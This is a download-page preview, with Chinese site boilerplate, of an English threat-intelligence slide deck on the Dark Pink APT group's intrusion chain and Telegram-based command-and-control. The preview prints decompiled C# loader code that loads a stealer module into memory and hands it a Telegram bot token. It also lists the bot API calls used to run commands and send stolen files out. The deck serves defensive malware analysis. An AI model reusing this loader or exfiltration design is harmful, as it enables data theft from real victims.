揭开Dark Pink的面纱——对APAC隐蔽的APT威胁的深入分析.pdf

编号:185956 PDF 27页 1.99MB 下载积分:VIP专享
下载报告请您先登录!

揭开Dark Pink的面纱——对APAC隐蔽的APT威胁的深入分析.pdf

1、Unveiling Dark Pink:An In-Depth Analysis of APACs Covert APT ThreatOUTLINEDark Pinks latest campaignTelegram Exfiltration and C2 demoTeleScoutDark Pinks TTPsI GOT AN EMAIL!(Group-IB,2023)ISO FILEISO FILESigned winword.exe sideloads wwlib.dllMalicious wwlib.dll sets up persistenceExtracts XOR encrypt

2、ed payload from.doc lureDisplays.doc lureSets up scheduled taskSCHEDULED TASKMicrosoft Build Task saved in Temp folderName wct*.tmp relates to normal OneDrive activity public static void main()string stealer_module=init_br();string Telegram_Chat_ID=Encoding.Default.GetString(chat_id_numbers);var inp

3、utStream=new MemoryStream(main_payload);ZipArchive archive=new ZipArchive(inputStream,ZipArchiveMode.Read);ZipArchiveEntry archEntry=archive.Entries0;Stream entryStream=archEntry.Open()var tmpMem=new MemoryStream();entryStream.CopyTo(tmpMem);var xtmp=tmpMem.ToArray();var memory_payload=Assembly.Load

4、(xtmp);byte Telegram_BOT_API_token=Convert.FromBase64String(0vHS+db60vvU+t6IpY+WpaKzh4WRsLyc0IGcgo26opyMv4y+r7yHsKj9lo23+Q=);foreach(Type type in memory_payload.GetExportedTypes()try var c=Activator.CreateInstance(type);type.InvokeMember(KaidnfAei,BindingFlags.InvokeMethod,null,c,new object Telegram

5、_BOT_API_token,Telegram_Chat_ID,stealer_module);catch continue;BUILD TASK6860236203:AAFrlFzcLuyXU4HxKisFUhvhwKucyL4rDS0TELEGRAM BOT APIUsed to communicate with bots in Telegram chatsHTTP-based interfaceFormat:https:/api.telegram.org/bot$token/$method?$paramsImportant methods:sendMessage?chat_id=&tex

6、t=:sends message to specified chatsendDocument?chat_id=&caption=:sends document to specified chatgetUpdates:Retrieves latest messages seen by the bot in Telegram chatsKAMIKAKABOT.NET executableSeparate.NET stealer moduleExecutes cmd.exe through/getUpdatesSends result back using/s

友情提示

1、下载报告失败解决办法
2、PDF文件下载后,可能会被浏览器默认打开,此种情况可以点击浏览器菜单,保存网页到桌面,就可以正常下载了。
3、本站不支持迅雷下载,请使用电脑自带的IE浏览器,或者360浏览器、谷歌浏览器下载即可。
4、本站报告下载后的文档和图纸-无水印,预览文档经过压缩,下载后原文更清晰。

本文(揭开Dark Pink的面纱——对APAC隐蔽的APT威胁的深入分析.pdf)为本站 (芦苇) 主动上传,三个皮匠报告文库仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。 若此文所含内容侵犯了您的版权或隐私,请立即通知三个皮匠报告文库(点击联系客服),我们立即给予删除!

温馨提示:如果因为网速或其他原因下载失败请重新下载,重复下载不扣分。
客服
商务合作
小程序
服务号
折叠